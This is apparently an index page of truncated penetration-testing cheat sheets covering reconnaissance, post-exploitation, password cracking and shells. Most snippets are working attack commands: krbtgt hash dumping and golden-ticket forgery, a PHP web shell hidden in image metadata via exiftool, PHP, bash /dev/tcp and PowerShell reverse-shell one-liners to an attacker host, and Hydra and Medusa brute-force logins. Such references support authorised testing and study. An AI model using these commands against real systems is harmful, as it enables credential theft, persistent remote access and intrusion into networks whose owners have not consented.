Table of Contents Intelligence Gathering Passive Information Gathering Whois Lookup NetCraft NSLookup Active Information Gathering Nmap Ipidseq Scan Running Nmap from MSFconsole Port Scan in MSF Targeted Scanning Server Message Block Scanning Microsoft SQL Servers SSH Server Scanning FTP Scanning Simple Network Management Protocol Sweeping Vulnerability Scanning The Basic Vulnerability Scan Specialty Vulnerability Scanners Validating…


Table of Contents Dump LSA Hashes Dump krbtgt Hash Golden Ticket Dump LSA Hashes lasdump::lsd /patch Dump krbtgt Hash lasdump::lsd /inject /name:krbtgt Golden Ticket kerberos::golden /User:<username> /domain:<domain> /sid:<user-sid> /krbtgt:<krbtgt-NTLM-hash> /id:500 /ptt # if successful misc::cmd # list other user's file dir \\<computer-name>\<driver>$


Table of Contents Extracting the Password Hashes Pass the Hash Capturing Key Strokes Token Impersonation Pivoting Through Sub-network Meterpreter Scripts Migrating to a Process Killing Antivirus Software Obtaining System Password Hashes Viewing All Traffic on a Target Machine Scraping a System Using Persistence Leveraging Post Exploitation Modules Upgrading Your Command Shell to Meterpreter Manipulating Windows…


Table of Contens Hide Code in Pictures Hide Code in Pictures exiftool -DocumentName="<h1>TEST<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" <pic.[jpg|jpeg|png|gig]>


Table of Contents Bash Python Bash SHELL=/bin/bash script -q /dev/null Python python -c 'import pty;pty.spawn("/bin/bash")'


Table of Contents JohnTheRipper Medusa Online Resources Hydra Parator JohnTheRipper zip2john <zipfile> > <outputfile> john <hashfile> –fork=4 –wordlist=<wordlist> Medusa # brute forcing SSH login with usernames and passwords medusa -h <host-ip> -U <user-file> -P <passwd-file> -M ssh <host-ip> Online Resources Hash crack – CrackStation Hydra hydra -l <username> -P <pass-file> http://domain http-post-form "</login/path/>:<login-data>[username=^USER^&password=^PASS^]:<error-response>[Incorrect Username]" Parator…


Table of Contents PHP Reverse Shell Bash NetCat Net Cat CheetSheet Bat File PHP Reverse Shell php -r '$sock=fsockopen("",4242);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' /usr/share/webshells/php/php-reverse-shell.php # cmd execution <?php system($_REQUEST['mycmd']) ?> Bash bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' NetCat nc <host> <port> If in meterpreter shell: execute -f…


Table of Contents Dirbuster Gobuster Dirsearch Wfuzz Other Useful Tools Dirbuster dirbuster -u -v -u <URL> -e <extensions> -l <wordlist> -r <report-location> Gobuster gobuster dir|dns <URL> -v -t <threads> -w <wordlist> Dirsearch -u <URL> -e <extensions> -t <threads> -c <cookies> –proxy=<proxy> Wfuzz wfuzz -c -v –hc <status-code> -w <wordlist> <URL>/FUZZ/* Other Useful Tools Tons…


Table of Contents Nmap Masscan Unicorn Scan Nmap nmap -A -T4 -p- -v -oN nmap.txt <host> Masscan masscan -p 1-65535 <host> -e <interface> –rate=<rate> Unicorn Scan us -mT -Iv <host>:<ports[a|]> -r <rate[3000|]> -R <round[3|]>


Table of Contents Reverse Shell One liner PowerSploit Invoke-Shellcode Invoke-WmiMethod Get-Keystrokes Exfiltration/Out-Minidump.ps1 Exfiltration/Get-TimedScreenshot.ps1 Nishang Get-Information.ps1 Get-WLAN-Keys.ps1 Get System Release ID Executing Command as Another User Get User ACL Go into Registry Mode Reverse Shell One liner $client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName…